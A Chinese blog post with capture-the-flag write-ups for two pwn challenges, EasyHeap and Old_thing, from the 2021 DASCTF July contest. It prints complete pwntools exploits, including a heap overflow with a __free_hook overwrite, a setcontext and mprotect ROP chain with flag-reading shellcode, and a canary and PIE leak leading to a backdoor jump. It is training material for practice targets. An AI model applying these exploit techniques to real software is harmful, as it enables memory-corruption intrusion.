2021DASCTF July X CBCTF pwn wp

最新推荐文章于 2023-06-05 19:18:21 发布
最新推荐文章于 2023-06-05 19:18:21 发布
阅读量278 收藏
点赞数
分类专栏: CTF PWN 文章标签: linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119938697
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

此题是7月末的比赛,本人旧博客搬到新博客啦,各位见谅哈(实际就是没钱租用服务器啦呜呜)

**EasyHeap wp:
Edit有堆溢出,有沙箱,禁用了execute,freehook为setcontext+5361即可,尝试orw就行了。写shellcode到hook,赋予权限即可,**

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p=process('./Easyheap')
p=remote('node4.buuoj.cn','29904')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc=ELF('./libc-2.27.so')
def add(size,con):
    p.sendlineafter('>> :\n','1')
    p.recvuntil('Size:')
    p.sendline(str(size))
    p.recvuntil('Content:')
    p.sendline(con)
def free(idx):
    p.sendlineafter('>> :\n','2')
    p.sendlineafter('Index:\n',str(idx))
 
def show(idx):
    p.sendlineafter('>> :\n','3')
    p.sendlineafter('Index:\n',str(idx))
 
def edit(idx,con):
    p.sendlineafter('>> :\n','4')
    p.recvuntil('Index:')
    p.sendline(str(idx))
    p.recvuntil('Content:')
    p.sendline(con)
[add(0x100,'a'*0x90) for i in range(7)]    
add(0x100,'a'*0x90)
add(0x100,'a'*0x90)
[free(i) for i in range(7)]
    
free(7)
[add(0x100,'a'*0x90) for i in range(7)]
add(0x100,'')
edit(7,'a'*0x20)
show(7)
libc_base=u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00'))-0x3ebc0a#-0x3e7a61#-0x3e4a20
print hex(libc_base)
edit(7,'a'*0x18+p64(0x81))
free_hook=libc_base+libc.sym['__free_hook']
print hex(free_hook)
exit_hook=libc_base+0x619060+3848
print hex(exit_hook)
system=libc_base+libc.sym['system']
malloc_hook=libc_base+libc.sym['__malloc_hook']-0x23
realloc=libc_base+libc.sym['__realloc_hook']
open1=libc_base+libc.sym['open']
rce=libc_base+0x4f365
setcontext = libc_base + libc.sym['setcontext'] + 53
syscall=libc_base+libc.search(asm("syscall\nret")).next()
print(hex(syscall))
free(7)
edit(0,'a'*0x98+p64(0x21)+p64(free_hook))
layout = [
    libc_base+libc.search(asm("pop rdi\nret")).next(), #: pop rdi; ret;
    free_hook & 0xfffffffffffff000,
    libc_base+libc.search(asm("pop rsi\nret")).next(), #: pop rsi; ret;
    0x2000,
    libc_base+libc.search(asm("pop rdx\nret")).next(), #: pop rdx; ret;
    7,
    libc_base+libc.search(asm("pop rax\nret")).next(), #: pop rax; ret;
    10,
    syscall, #: syscall; ret;
    libc_base+libc.search(asm("jmp rsp")).next(), #: jmp rsp;
]
 
shellcode = asm('''
sub rsp, 0x800
push 0x67616c66
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall
 
cmp eax, 0
js failed
 
mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall
 
mov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscall
 
jmp exit
 
failed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall
 
exit:
xor edi, edi
mov eax, 231
syscall
''')
frame = SigreturnFrame()
frame.rax=0
frame.rdi=0
frame.rsi=free_hook&0xfffffffffffff000
frame.rdx=0x2000
frame.rsp=free_hook&0xfffffffffffff000
frame.rip=syscall
p1=str(frame)
add(0x100,'ddd')
add(0x100,p64(setcontext))
add(0x300,'a'*0x190)
add(0x120,'d'*0x110)
edit(9,p1)
free(9)
p.sendline(flat(layout) + shellcode)
p.interactive()

**Old_thing wp:
难点在登录账号和密码的地方,随便找个md5加密后开头是0字节的字符串,然后输入密码的时候有个溢出,可以把第一个字节覆盖成0字节,分两次泄露canary和elf_base基地址,然后打后门就可以了**

exp:

from pwn import *
 
p=process('./canary3')
p=remote('node4.buuoj.cn',29587)
context.log_level='debug'
p.sendlineafter('username: ','admin\x00')
p.sendlineafter('password: ','A80\x00'.ljust(0x20,'\x00'))
 
#pie
p.sendlineafter('3.exit\n','2')
p.sendlineafter('your input:\n','a'*0x8)
 
#gdb.attach(p,'b *$rebase(0x249e)')
 
p.sendlineafter('3.exit\n','1')
p.recvuntil('aaaaaaaa')
pie=u64(p.recv(6).ljust(8,'\x00'))+0x55a9438dc000-0x55a9438dca0a
success('pie:'+hex(pie))
#canary
p.sendlineafter('3.exit\n','2')
p.sendlineafter('your input:\n','a'*0x18)
 
 
p.sendlineafter('3.exit\n','1')
p.recvuntil('a'*0x18)
canary=u64(p.recv(8).ljust(8,'\x00'))-0xa
success('canary:'+hex(canary))
 
#overflow
p.sendlineafter('3.exit\n','2')
p.sendlineafter('your input:\n','a'*0x18+p64(canary)+'a'*8+p64(pie+0x239f))
 
 
p.interactive()

jsjsj11123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
FUCKING12的博客
10-06 1134
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
[DASCTF 2023六月挑战赛|二进制专项] 5个pwn
weixin_52640415的博客
06-04 1190
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1247
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和中将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程中提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
DASCTF 2023六月挑战赛|二进制专项 PWN
weixin_51890658的博客
06-05 350
通过ida分析和gdb调试i在rbp-c中,它是int类型占4字节,还有两次格式化字符串漏洞,可通过这两次修改为i的值,第一次是把args参数链修改为i地址,第二次是修改i值即可再次使用格式化字符串漏洞。因为有堆溢出和uaf,可以伪装fastchunk,通过gdb调试0x602095地址的值为0x7f,可伪装。64位,也给了libc库,开了canary和pie地址随机 拖入ida看存在格式化字符串漏洞,有3次。64位的,给了libc库,开了canary,拖入ida分析,在edit函数中存在堆溢出。
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th WriteUp
mumuzi的博客
08-02 2666
最后十分钟掉了4名可还行 只写自己做了的,队友出的就不写了 Crypto:Yusa的密码学签到——BlockTrick 不知道啥意思,反正当复读机就行了。 MISC-问卷题 DASCTF{79f3bb47a2e2d46def82c052eccb7b80}
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
2021-鹏城实验室-pwn-babyheap.zip
09-28
2021年鹏城实验室的pwn题,考查了libc-2.31.so下off-by-null的漏洞利用,值得学习一波。
赣网杯2021_pwn2.rar
12-11
赣网杯2021 pwn1 bin ctf
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
DASCTF 7月赋能赛pwn wp
N1rvana的博客
07-25 477
DASCTF 7月赋能赛pwn wp
2021dasctf七月赛 pwn题解复现(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 871
前言:算是第一次参加自己觉得能力匹配的比赛之前的0ctf,tctf的,感觉自己就像个混子,2021国赛参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比赛嘛,总归是不可能会做的,不过也算是知道了,比赛也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
DASCTF X GFCTF 2022十月挑战赛 - pwn
z1r0的博客
10-28 830
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF old_thing
yongbaoii的博客
08-12 398
RELRO半开。 进来以后首先需要登录。 用户名是admin,但是密码需要逆向一下。 进来之后是两个功能,一个leak,一个overflow。 因为开了canary,所以我们只要先把canary最后一个字节的’\x00’写掉,然后泄露一下就好了。 之后就是overflow一套带走。 ...
使用RedisTemplate的PipeLine没有返回值原因分析
qq_34826261的博客
11-23 4263
使用RedisTemplate的PipeLine没有返回值1、现象2、分析原因1、RedisTemplate的executePipelined方法源码2、RedissionConnection的closePipeline方法源码3、如何获取返回值 1、现象 **背景:**在使用redis去重时,试图使用redisTemlate的pipeline进行setnx操作,根据返回值判断参数是否重复。 测试代码: private List<Boolean> test1() { List<Boole
DASCTF 6月部分pwn wp
starssgo的博客
06-27 1079
感觉质量挺高的,有点昏迷, 目录Memory-Monster-IVoooooordereasyheapspringboardsecret写在最后 Memory-Monster-IV 这个题我是真的服了,恶心了我一天时间,最后还是没出,知道是要改got表,而且每次只能改一个字节,第一次改后变成ret之类的无用函数,我是不想说啥,没复现出来,贴下作者的分析把: http://taqini.space/2020/06/26/DASCTF-June-Memory-Monster-IV-200pt/ 我感觉能学到的东
DASCTF2020-7月赛 部分wp(misc,pwn,crypto)
ATFWUS的博客
07-25 1919
五个小时,刚好把杂项,密码学,pwn的签到题做出来了,哈哈哈,wp记录一下。 比赛时间:2020-07-25 10:00-15:00 0x01.MISC - welcome to the misc world 文件下载 :链接:https://pan.baidu.com/s/1QfoFQUORH5n0zTEdHNXiAw 提取码:FWUS 考点: 1.lsb隐写与zsteg的使用 2.Nfts隐写 3.base85加密 下载得到的是一个rar文件。 解压的得到一张图片和一个压缩包,压缩包.
2021-DASCTF-三月赛-Writeup
热门推荐
末初的CSDN博客
03-29 1万+
文章目录WEBMISC签到简单的png隐写雾都孤儿小田的秘密Ascii_art问卷调查 和团队的师傅们组队拿了个第十,师傅们带飞,我就是团队的MVP(Most Vegetable People) WEB 等复现环境出来了再写 MISC 签到 公众号语音识别:异世相遇!尽享美味!安恒赛高! 见笑了,偶四南方银,藕的普通话不镖准哈哈哈~ DASCTF{welcome_to_march_dasctf} 简单的png隐写 一开始以为hint.png是伪加密,flag.jpg是真加密,结果后
2021DASCTF July X CBCTF 4th(wp)
qq_50589021的博客
08-25 792
CRYPTO Yusa的密码学签到——BlockTrick nc连接以后出来哪个就复制哪个,最后得到flag WEB ezrce 此题属于是YAPI接口管理平台RCE,利用csdn上找到的exp可以直接打: YAPI接口管理平台RCE复现-附exp cat flag 这个题目有点脑洞了 首先是访问/var/log/nginx/aeecss.log 得知真正的flag文件 然后写了一个ascii的不可见字符的fuzz字典生成脚本: <?php $myfile = fopen("ascii.txt"
docker pwn
最新发布
01-29
Docker Pwn是一种使用Docker容器来解决CTF(Capture The Flag)挑战的方法。它提供了一个轻量级的环境,可以在其中运行和调试二进制文件,以便进行漏洞利用和渗透测试。 要使用Docker Pwn,您可以按照以下步骤进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值